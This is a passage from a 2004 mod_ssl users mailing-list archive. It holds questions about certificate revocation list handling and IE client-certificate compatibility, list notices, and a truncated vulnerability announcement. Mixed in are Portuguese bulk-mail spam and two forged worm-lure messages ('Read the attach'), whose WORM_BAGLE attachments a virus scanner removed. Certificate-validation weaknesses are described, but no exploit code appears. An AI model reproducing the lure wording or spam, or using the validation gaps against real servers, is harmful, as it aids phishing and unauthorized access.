/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//fwAA

----------szfluzaepvkgvdcswwas
Content-Type: application/octet-stream; name="Details.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Details.zip"



----------szfluzaepvkgvdcswwas--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul  7 17:12:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 918FCA8940; Wed,  7 Jul 2004 17:12:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay2.mail2web.com (relay2.mail2web.com [168.144.1.82])
	by master.modssl.org (Postfix) with ESMTP id E06ACA8934
	for ; Wed,  7 Jul 2004 17:12:12 +0200 (CEST)
Received: from M2W079.mail2web.com ([168.144.251.189]) by relay2.mail2web.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 7 Jul 2004 11:11:48 -0400
Message-ID: <202640-22004737151143279@M2W079.mail2web.com>
X-Priority: 3
X-Originating-IP: 137.242.1.50
X-URL: http://mail2web.com/
From: "rlabbe@satx.rr.com" 
To: modssl-users@modssl.org
Subject: Certificate Revocation List Flaw or Vulnerability
Date: Wed, 7 Jul 2004 11:11:43 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
X-OriginalArrivalTime: 07 Jul 2004 15:11:48.0833 (UTC) FILETIME=[B99C6D10:01C46434]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rlabbe@satx.rr.com" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All,

I=92m not sure if this would be considered a vulnerability or lack of
functionality of Mod_SSL or OpenSSL=2E

Test Platform

Red Hat Linux 9=2E0
Apache 1=2E3=2E31
Mod_SSL 2=2E8=2E18
OpenSSL  0=2E9=2E7d

Apache server is configured for client authentication using digital
certificates and validation of a certificate revocation list (CRL) file=2E=


Certificate Revocation List Concern:

If using the Certificate File directive for a CRL, Apache will start with
an expired CRL file=2E I am trusting several Certificate Authorities, but
only have one CRL file (expired) from one of the CAs=2E I am allowed acces=
s
using a revoked certificate as long as it is not issued from the CA of the=

expired CRL file=2E I am not allowed access if I select a certificate issu=
ed
from the CA of the CRL file I=92m using=2E The logging is correct in that
Apache is going to deny access for all clients of that particular CA until=

I get a new CRL=2E=20

If using the Symbolic Link directive for the CRL file, Apache will start
with NO CRL file available=2E Apache will allow revoked certificates to
access all protected pages=2E=20

I=92ve also noticed a similar behavior with path validation when using cli=
ent
authentication and digital certificates=2E It seems as though Apache will
allow access as long as it can find a CA it trusts in the chain of the
client=92s certificate=2E Shouldn=92t Apache/Mod_SSL validate the trust of=
 each
CA in the path for a client certificate? You can configure how deep to
validate the certificate, but it seems as though it=92s just going to chec=
k
as far up the chain until it finds a CA certificate it trusts and then
stops=2E

Internet Explorer was vulnerable to this type of attack because the browse=
r
did not validate the trust of each certificate in the chain=2E Someone cou=
ld
stand up their own CA using OpenSSL and issue digital certificates using a=

signed certificate from a higher level CA=2E Internet Explorer would just
look through the tree until it found a CA that was trusted instead of
alerting the user that a rogue CA certificate had been found in the path=2E=


Any feedback would be appreciated=2E=20

Thanks,

Rene



--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web=2Ecom/ =2E


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 13 00:30:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 925E5A893A; Tue, 13 Jul 2004 00:30:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vsmtp3alice.tin.it (vsmtp3alice.tin.it [212.216.176.143])
	by master.modssl.org (Postfix) with ESMTP id DCB0BA8938
	for ; Tue, 13 Jul 2004 00:30:22 +0200 (CEST)
Received: from [192.168.1.4] (82.51.159.139) by vsmtp3alice.tin.it (7.0.027) (authenticated as antonella.carlini@tin.it)
        id 40CF29DA0022C3B5 for modssl-users@modssl.org; Tue, 13 Jul 2004 00:30:08 +0200
Message-ID: <40F310F0.60805@arsretia.net>
Date: Tue, 13 Jul 2004 00:30:08 +0200
From: Mario Ottone 
Organization: Arsretia S.r.l.
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616
X-Accept-Language: it, es, de, en, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: MSIE Patch level 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mario Ottone 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi to all,

i've a problem apparently imputable to MS Internet Explorer.

I run an Apache 1.3.22 with modssl 2.8.5 and openssl 0.9.6i.
The connection is established on a standard https with "SSLVerifyClient 
require" option.

All works fine if i use mozilla (ver. 1.5 and later), but when i use IE 
the connection is established correctly only when i install some patch.
My experience on this problem is that only combinations of O.S. version, 
O.S. service pack, IE version, IE service pack and IE patch works 
correctly and other combinations doesn't work.

Does anybody knows other valid combinations of such pieces of software 
that works properly?

Does anybody knows if modss and openssl has some glitch or bug that 
cause that problem?

TIA for the time you want to dedicate to this issue.

Working combinations:
Win XP Pro SP1
IE 6.0.2800.1106: SP1; Q832894

Win 2k Pro SP4
IE 6.0.2800.1106: SP1; Q832894

Win 2k Pro SP2
IE 6.0.2800.1106: SP1

Win 2k Pro SP2
IE 5.50.4807.2300: SP1; Q832894

Win 2k Pro
IE 6.0.2800.1106: SP1; Q832894
or
IE 5.00.2195: SP2; SRP1; Q329115; Q323172


-- 
Mario Ottone
Arsretia S.r.l.
Via D. Sansotta, 97
00144 Roma (IT)
e-mail: m.ottone@arsretia.net
Tel.: +390652270097
Fax : +390652272313



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 13 10:30:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 917EDA8962; Tue, 13 Jul 2004 10:30:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (ftp.aeccom.com [213.61.120.228])
	by master.modssl.org (Postfix) with ESMTP id 3831FA8938
	for ; Tue, 13 Jul 2004 10:30:14 +0200 (CEST)
Received: from localhost (toro [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id 72D386402F
	for ; Tue, 13 Jul 2004 10:29:44 +0200 (CEST)
Received: from mail2.aeccom.com (gate2.aeccom.com [212.202.101.158])
	by mail.aeccom.com (Postfix) with ESMTP id D21C26402E
	for ; Tue, 13 Jul 2004 10:29:43 +0200 (CEST)
Received: from [192.168.2.14] (andes.core.aeccom.com [192.168.2.14])
	by mail2.aeccom.com (Postfix) with ESMTP id 785E43F
	for ; Tue, 13 Jul 2004 10:29:43 +0200 (CEST)
Subject: Re: MSIE Patch level
From: Sven Geisler 
To: modssl-users@modssl.org
In-Reply-To: <40F310F0.60805@arsretia.net>
References: <40F310F0.60805@arsretia.net>
Content-Type: text/plain
Organization: AEC/communications GmbH
Message-Id: <1089707383.15979.14.camel@andes.core.aeccom.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-7) 
Date: Tue, 13 Jul 2004 10:29:43 +0200
Content-Transfer-Encoding: 7bit
X-Virus-Scanned-By: AMaViS-ng 0.1.6.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Mariom

I did some change to the config related to M$IE 6.0.
I increased the KeepAliveTimeout to 360.
I removed the general rule for M$IE and SSL and set it to 

SetEnvIf User-Agent     ".*MSIE.*"      ssl-unclean-shutdown
SetEnvIf User-Agent     ".*MSIE 5.*"    ssl-unclean-shutdown nokeepalive
downgrade-1.0 force-response-1.0

It is only for https pages (SSLEngine on). The rest is mostly default.

This is all to enable keepalive and HTTP/1.1 for M$IE 6.0. I didn't pay
attention to M$IE < 5.0 because my customer didn't use this once.

I hope this helps you.

Regards
Sven.

Am Di, den 13.07.2004 schrieb Mario Ottone um 00:30:
> Hi to all,
> 
> i've a problem apparently imputable to MS Internet Explorer.
> 
> I run an Apache 1.3.22 with modssl 2.8.5 and openssl 0.9.6i.
> The connection is established on a standard https with "SSLVerifyClient 
> require" option.
> 
> All works fine if i use mozilla (ver. 1.5 and later), but when i use IE 
> the connection is established correctly only when i install some patch.
> My experience on this problem is that only combinations of O.S. version, 
> O.S. service pack, IE version, IE service pa
> ck and IE patch works 
> correctly and other combinations doesn't work.
> 
> Does anybody knows other valid combinations of such pieces of software 
> that works properly?
> 
> Does anybody knows if modss and openssl has some glitch or bug that 
> cause that problem?
> 
> TIA for the time you want to dedicate to this issue.
> 
> Working combinations:
> Win XP Pro SP1
> IE 6.0.2800.1106: SP1; Q832894
> 
> Win 2k Pro SP4
> IE 6.0.2800.1106: SP1; Q832894
> 
> Win 2k Pro SP2
> IE 6.0.2800.1106: SP1
> 
> Win 2k Pro SP2
> IE 5.50.4807.2300: SP1; Q832894
> 
> Win 2k Pro
> IE 6.0.2800.1106: SP1; Q832894
> or
> IE 5.00.2195: SP2; SRP1; Q329115; Q323172
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 13 14:47:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CCFF4A893B; Tue, 13 Jul 2004 14:47:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.arsretia.net (adsl147.15.cyb.it [195.191.15.147])
	by master.modssl.org (Postfix) with ESMTP id 690FFA8933
	for ; Tue, 13 Jul 2004 14:47:12 +0200 (CEST)
Received: from [192.168.91.22] (krug.arsretia.net [192.168.91.22])
	by mail.arsretia.net (Postfix on SuSE Linux 8.2 (i586)) with ESMTP id 6EEE225DEB
	for ; Tue, 13 Jul 2004 14:46:34 +0200 (CEST)
Message-ID: <40F3D9AB.8050303@arsretia.net>
Date: Tue, 13 Jul 2004 14:46:35 +0200
From: Mario Ottone 
Organization: Arsretia S.r.l.
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040616
X-Accept-Language: it, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: MSIE Patch level
References: <40F310F0.60805@arsretia.net> <1089707383.15979.14.camel@andes.core.aeccom.com>
In-Reply-To: <1089707383.15979.14.camel@andes.core.aeccom.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mario Ottone 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks, Sven,  for your answer, but i miss some important informations...
- the server is only a frontend for Catalina (jsp container), the HTML 
is dynamically generated, and only images are static and managed by apache
- the audience for this site is not under my control and then i cannot 
force a specific version of a browser

Sven Geisler wrote:

>Hi Mariom
>
>I did some change to the config related to M$IE 6.0.
>I increased the KeepAliveTimeout to 360.
>  
>
see previous information

>I removed the general rule for M$IE and SSL and set it to 
>
>SetEnvIf User-Agent     ".*MSIE.*"      ssl-unclean-shutdown
>SetEnvIf User-Agent     ".*MSIE 5.*"    ssl-unclean-shutdown nokeepalive
>downgrade-1.0 force-response-1.0
>
>  
>
these settings are already activated

>It is only for https pages (SSLEngine on). The rest is mostly default.
>
>This is all to enable keepalive and HTTP/1.1 for M$IE 6.0. I didn't pay
>attention to M$IE < 5.0 because my customer didn't use this once.
>
>I hope this helps you.
>
>Regards
>Sven.
>  
>
I cannot find any information neither from Microsoft site nor from 
Internet newsgroup, so i hope that other people with similar problem 
wants to exchange their experiences on this type of problem.
I didn't find on Microsoft site information about interdependencies 
between service pack and patches, this may help but, only if you 
navigate through the site and read every patches release comment, 
perhaps you find this informations.

Bye.




>Am Di, den 13.07.2004 schrieb Mario Ottone um 00:30:
>  
>
>>Hi to all,
>>
>>i've a problem apparently imputable to MS Internet Explorer.
>>
>>I run an Apache 1.3.22 with modssl 2.8.5 and openssl 0.9.6i.
>>The connection is established on a standard https with "SSLVerifyClient 
>>require" option.
>>
>>All works fine if i use mozilla (ver. 1.5 and later), but when i use IE 
>>the connection is established correctly only when i install some patch.
>>My experience on this problem is that only combinations of O.S. version, 
>>O.S. service pack, IE version, IE service pa
>>ck and IE patch works 
>>correctly and other combinations doesn't work.
>>
>>Does anybody knows other valid combinations of such pieces of software 
>>that works properly?
>>
>>Does anybody knows if modss and openssl has some glitch or bug that 
>>cause that problem?
>>
>>TIA for the time you want to dedicate to this issue.
>>
>>Working combinations:
>>Win XP Pro SP1
>>IE 6.0.2800.1106: SP1; Q832894
>>
>>Win 2k Pro SP4
>>IE 6.0.2800.1106: SP1; Q832894
>>
>>Win 2k Pro SP2
>>IE 6.0.2800.1106: SP1
>>
>>Win 2k Pro SP2
>>IE 5.50.4807.2300: SP1; Q832894
>>
>>Win 2k Pro
>>IE 6.0.2800.1106: SP1; Q832894
>>or
>>IE 5.00.2195: SP2; SRP1; Q329115; Q323172
>>
>>    
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

-- 
Mario Ottone
Arsretia S.r.l.
Via D. Sansotta, 97
00144 Roma (IT)
e-mail: m.ottone@arsretia.net
Tel.: +390652270097
Fax : +390652272313

INFORMAZIONE RISERVATA E CONFIDENZIALE Questo messaggio contiene
informazioni riservate e confidenziali. Se il lettore non fosse il
destinatario del messaggio, inoltrato e ricevuto per errore, il testo dovrà
essere immediatamente cancellato dal computer del ricevente. E'
assolutamente proibita qualunque circolazione, disseminazione o copia del
messaggio spedito e/o ricevuto per errore. AVVERTENZA: I messaggi e-mail non
offrono chiara evidenza del loro ricevimento e, quindi, per istruzioni
relative a pratiche in scadenza consigliamo di utilizzare mezzi di
comunicazione alternativi.

CONFIDENTIALITY and WARNING NOTICE This message may contain legally
privileged or confidential information. If the reader is not the intended
recipient, you received this message in error and it should therefore be
deleted from your computer at once. Any dissemination,distribution and
copying of a message mistakenly sent or received is strictly forbidden.
E-mail does not give positive evidence of receipt, for pending deadlines
alternative back-up is highly recommended.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From MAILER-DAEMON  Wed Jul 14 12:56:07 2004
Return-Path: <>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from omr-r02.mail.aol.com (omr-r02.mx.aol.com [152.163.225.130])
	by master.modssl.org (Postfix) with ESMTP id BCA47A8944
	for ; Wed, 14 Jul 2004 12:55:51 +0200 (CEST)
Received: from localhost (localhost)
	  by rly-na01.mx.aol.com (8.8.8/8.8.8/AOL-5.0.0)
	  with internal id GAO28325;
	  Wed, 14 Jul 2004 06:55:36 -0400 (EDT)
Date: Wed, 14 Jul 2004 06:55:36 -0400 (EDT)
From: Mail Delivery Subsystem 
Message-Id: <200407141055.GAO28325@rly-na01.mx.aol.com>
To: 
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="GAO28325.1089802536/rly-na01.mx.aol.com"
Subject: Returned mail: User unknown
Auto-Submitted: auto-generated (failure)

This is a MIME-encapsulated message

--GAO28325.1089802536/rly-na01.mx.aol.com

The original message was received at Wed, 14 Jul 2004 06:55:21 -0400 (EDT)
from cdma-3g1x-176-192.zappmobile.ro [80.97.176.192]


*** ATTENTION ***

Your e-mail is being returned to you because there was a problem with its
delivery.  The address which was undeliverable is listed in the section
labeled: "----- The following addresses had permanent fatal errors -----".

The reason your mail is being returned to you is listed in the section
labeled: "----- Transcript of Session Follows -----".

The line beginning with "<<<" describes the specific reason your e-mail could
not be delivered.  The next line contains a second error message which is a
general translation for other e-mail servers.

Please direct further questions regarding this message to your e-mail
administrator.

--AOL Postmaster



   ----- The following addresses had permanent fatal errors -----


   ----- Transcript of session follows -----
... while talking to air-na02.mail.aol.com.:
>>> RCPT To:
<<< 550 MAILBOX NOT FOUND
550 ... User unknown

--GAO28325.1089802536/rly-na01.mx.aol.com
Content-Type: message/delivery-status

Reporting-MTA: dns; rly-na01.mx.aol.com
Arrival-Date: Wed, 14 Jul 2004 06:55:21 -0400 (EDT)

Final-Recipient: RFC822; tarrekhabybi@netscape.net
Action: failed
Status: 5.1.1
Remote-MTA: DNS; air-na02.mail.aol.com
Diagnostic-Code: SMTP; 550 MAILBOX NOT FOUND
Last-Attempt-Date: Wed, 14 Jul 2004 06:55:36 -0400 (EDT)

--GAO28325.1089802536/rly-na01.mx.aol.com
Content-Type: text/rfc822-headers

Received: from  netscape.net (cdma-3g1x-176-192.zappmobile.ro [80.97.176.192]) by rly-na01.mx.aol.com (v100.23) with ESMTP id MAILRELAYINNA12-c40f511043e1; Wed, 14 Jul 2004 06:55:06 -0400
Received: from unknown [80.97.178.175] by 172.31.7.10; 14 Jul 2004 13:55:11 +0300
From: modssl-users-l@master.modssl.org
To: tarrekhabybi@netscape.net
Subject: Re: Thanks!
Date: Wed, 14 Jul 2004 13:49:26 +0300
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0011_0000730C.00001505"
X-Priority: 3
X-MSMail-Priority: Normal
X-AOL-IP: 80.97.176.192
X-AOL-SCOLL-SCORE: 0:XXX:XX
X-AOL-SCOLL-URL_COUNT: 0
Message-ID: <200407140655.c40f511043e1@rly-na01.mx.aol.com>

--GAO28325.1089802536/rly-na01.mx.aol.com--


From dumiranda8756bw@mail.com  Thu Jul 15 15:20:43 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mail.com (201009086185.user.veloxzone.com.br [201.9.86.185])
	by master.modssl.org (Postfix) with SMTP id 4421BA8938
	for ; Thu, 15 Jul 2004 15:20:26 +0200 (CEST)
From: "Edu Miranda" 
To: 
Subject: aa Mala Direta EMAILS LISTA
Sender: "Edu Miranda" 
Mime-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"
Date: Thu, 15 Jul 2004 10:20:35 -0300
Content-Transfer-Encoding: 8bit
Message-Id: <20040715132026.4421BA8938@master.modssl.org>

MALA DIRETA EMAIL EMAILS DIGITAL ELETRÔNICO, CADASTROS, SEGMENTOS, 
CADASTROS ATUALIZADOS COM LISTAS DE E-MAIL PARA MALA DIRETA E EMAIL 
MARKETING
http://www.gueb.de/divulgamail

e-mails para mala direta, e-mails, emails, email, EMAIL, listas de 
e-mails,mailing list,listagem,cadastros,listas de e-mail,marketing 
direto,mmv,publicidade. Como divulgar seu negócio através do e-mail 
marketing. Listas de e-mails de São Paulo e de todo o Brasil. Conheça o 
melhor site do segmento de mala direta via e-mail
http://www.gueb.de/divulgamail

From owner-modssl-users@modssl.org  Fri Jul 16 02:57:42 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B6307A8959; Fri, 16 Jul 2004 02:57:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from inet-tsb.toshiba.co.jp (inet-tsb.toshiba.co.jp [202.33.96.40])
	by master.modssl.org (Postfix) with ESMTP id 8A441A8938
	for ; Fri, 16 Jul 2004 02:57:40 +0200 (CEST)
Received: from tsb-wall.toshiba.co.jp ([133.199.160.134])
	by inet-tsb.toshiba.co.jp  with ESMTP id i6G0vNpD016824
	for ; Fri, 16 Jul 2004 09:57:23 +0900 (JST)
Received: (from root@localhost)
	by tsb-wall.toshiba.co.jp  id i6G0vNHV025333
	for ; Fri, 16 Jul 2004 09:57:23 +0900 (JST)
Received: from tis2 [133.199.160.66] by tsb-wall.toshiba.co.jp with SMTP id KAA25327 ; Fri, 16 Jul 2004 09:57:23 +0900
Received: from mx.toshiba.co.jp by tis2.tis.toshiba.co.jp 
	id JAA27415; Fri, 16 Jul 2004 09:57:22 +0900 (JST)
Received: from tsb-sgw3.toshiba.co.jp by toshiba.co.jp id JAA13482; Fri, 16 Jul 2004 09:56:50 +0900 (JST)
Received: from satou_haruo_pc.org 
	by tsb-sgw3.toshiba.co.jp  with SMTP id i6G0u2W5019577
	for ; Fri, 16 Jul 2004 09:56:03 +0900 (JST)
Date: Fri, 16 Jul 2004 10:01:05 +0900
To: "Modssl-users" 
From: "Rse" 
Subject: Site changes
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dxvqvfdwqbntkdtfpkki"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dxvqvfdwqbntkdtfpkki
Content-Type: text/plain;
	charset=iso-2022-jp
Content-Transfer-Encoding: 7bit

***********************
-- In Japanese --
$B%&%$%k%9(B (WORM_BAGLE.AF) $B$,E:IU%U%!%$%k(B (Readme.com) $B$+$i8!=P$5$l$^$7$?!#(B
$Bl9g$O%U%!%$%k$+$i%&%$%k%9$,6n=|$5$l$F$$$^$9$N$G0BA4$G$9(B)(B

-- In English --
Found virus (WORM_BAGLE.AF) in file (Readme.com)
Action: The file is remove.
***********-***********

----------dxvqvfdwqbntkdtfpkki
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


Attach tells  everything.







----------dxvqvfdwqbntkdtfpkki--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 16 03:43:33 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8227A8943; Fri, 16 Jul 2004 03:43:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from inet-tsb.toshiba.co.jp (inet-tsb.toshiba.co.jp [202.33.96.40])
	by master.modssl.org (Postfix) with ESMTP id 19757A893A
	for ; Fri, 16 Jul 2004 03:43:16 +0200 (CEST)
Received: from tsb-wall.toshiba.co.jp ([133.199.160.134])
	by inet-tsb.toshiba.co.jp  with ESMTP id i6G1gwpD008781
	for ; Fri, 16 Jul 2004 10:42:58 +0900 (JST)
Received: (from root@localhost)
	by tsb-wall.toshiba.co.jp  id i6G1gwHM025199
	for ; Fri, 16 Jul 2004 10:42:58 +0900 (JST)
Received: from tis2 [133.199.160.66] by tsb-wall.toshiba.co.jp with SMTP id LAA25189 ; Fri, 16 Jul 2004 10:42:58 +0900
Received: from mx.toshiba.co.jp by tis2.tis.toshiba.co.jp 
	id KAA26928; Fri, 16 Jul 2004 10:42:53 +0900 (JST)
Received: from tsb-sgw3.toshiba.co.jp by toshiba.co.jp id KAA19582; Fri, 16 Jul 2004 10:35:44 +0900 (JST)
Received: from n540tsda3_hdq.org 
	by tsb-sgw3.toshiba.co.jp  with SMTP id i6G1ZWW5028109
	for ; Fri, 16 Jul 2004 10:35:35 +0900 (JST)
Date: Fri, 16 Jul 2004 10:37:03 +0900
To: "Modssl-users" 
From: "Rse" 
Subject: Notification
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------oqaensvenidnukswtdbt"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------oqaensvenidnukswtdbt
Content-Type: text/plain;
	charset=iso-2022-jp
Content-Transfer-Encoding: 7bit

***********************
-- In Japanese --
$B%&%$%k%9(B (WORM_BAGLE.AF) $B$,E:IU%U%!%$%k(B (Message.scr) $B$+$i8!=P$5$l$^$7$?!#(B
$Bl9g$O%U%!%$%k$+$i%&%$%k%9$,6n=|$5$l$F$$$^$9$N$G0BA4$G$9(B)(B

-- In English --
Found virus (WORM_BAGLE.AF) in file (Message.scr)
Action: The file is remove.
***********-***********

----------oqaensvenidnukswtdbt
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


Read the  attach.







----------oqaensvenidnukswtdbt--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 16 10:37:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D7758A8A5D; Fri, 16 Jul 2004 10:37:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 676C5A8974
	for ; Fri, 16 Jul 2004 10:37:41 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4BCBB4CE5FB; Fri, 16 Jul 2004 10:37:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D25DE285DE; Fri, 16 Jul 2004 10:37:16 +0200 (CEST)
Date: Fri, 16 Jul 2004 10:37:16 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: spam to internal exploder list now rejected
Message-ID: <20040716083716.GA25490@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Recently there was often spam on modssl-users because spammers directly
sent to the internal mailing list exploder address and the prevention
configuration for this had a subtle bug. The filter is now fixed and
such mails are now successfully rejected. Sorry for the inconvenience.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 16 22:43:45 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8A704A8974; Fri, 16 Jul 2004 22:43:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 4505BA8943; Fri, 16 Jul 2004 22:43:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP
	id 267B9A8943; Fri, 16 Jul 2004 22:42:13 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1373C4CE5FB; Fri, 16 Jul 2004 22:42:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A115E285DE; Fri, 16 Jul 2004 22:42:07 +0200 (CEST)
Date: Fri, 16 Jul 2004 22:42:07 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.19 for Apache 1.3.31
Message-ID: <20040716204207.GA45678@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We've today found an ssl_log() related format string vulnerability in
the mod_proxy hook functions of mod_ssl for Apache 1.3.x (mod_ssl for
